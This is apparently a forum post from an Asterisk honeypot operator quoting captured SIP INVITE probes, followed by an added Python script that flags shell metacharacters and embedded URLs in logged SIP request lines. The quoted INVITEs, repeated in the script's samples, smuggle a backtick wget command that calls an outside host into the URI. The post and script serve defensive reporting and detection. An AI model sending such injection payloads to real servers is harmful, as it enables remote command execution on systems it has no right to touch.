I haven't seen this sort of URI/shell attack prior to today, but it looks interesting. It embeds a backtick in the URI with a wget that doesn't seem to do much beyond writing to an empty file.
I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their web logs at 91.223.89.94). (This happens to be my "honeypot" that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-) )

INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0

Does Asterisk have a shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI?

Tom
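An added example, not part of Tom's post or of Asterisk itself, showing how a defender could scan logged SIP request lines for exactly this pattern: undo the logger's \x20 escapes, isolate the user part of the Request-URI, and flag shell metacharacters or embedded URLs there. The suspicious sample lines are taken from the INVITEs quoted above; the benign lines are constructed for comparison.

```python
import re
from urllib.parse import unquote

# Constructed sample batch: the two distinct INVITE lines quoted in the post
# (\x20 is how the logger rendered spaces) plus two made-up benign requests.
SAMPLE_REQUEST_LINES = [
    r"INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0",
    r"INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0",
    "INVITE sip:0012345678900@x.x.x.x SIP/2.0",   # ordinary call
    "REGISTER sip:x.x.x.x SIP/2.0",               # no user part at all
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<uri>\S+) SIP/2\.0$")
# Characters that let a user part escape into a shell if some component
# ever hands it unquoted to system()/exec; backtick is the one seen here.
SHELL_META = re.compile(r"[`$;|&<>(){}\\'\"]")

def decode_log_escapes(s):
    """Turn the logger's \\xNN escapes back into the characters actually sent."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def analyse_request_line(line):
    """Return a dict describing one SIP request line, or None if it isn't one."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    uri = decode_log_escapes(m.group("uri"))
    # Drop the scheme, then split on the rightmost '@' so an '@' smuggled
    # inside the payload cannot shift what we treat as the host.
    userinfo, _, host = uri.partition(":")[2].rpartition("@")
    user = unquote(userinfo)            # also undo %XX percent-encoding
    meta = sorted(set(SHELL_META.findall(user)))
    urls = re.findall(r"https?://[^\s`'\"]+", user)
    return {
        "method": m.group("method"),
        "user": user,
        "host": host,
        "shell_metachars": meta,
        "embedded_urls": urls,
        "suspicious": bool(meta or urls),
    }

def suspicious_requests(lines):
    """Reduce a batch of logged request lines to the ones worth alerting on."""
    parsed = (analyse_request_line(l) for l in lines)
    return [r for r in parsed if r and r["suspicious"]]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_REQUEST_LINES):
        print(hit["method"], hit["host"], hit["shell_metachars"], hit["embedded_urls"])
```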
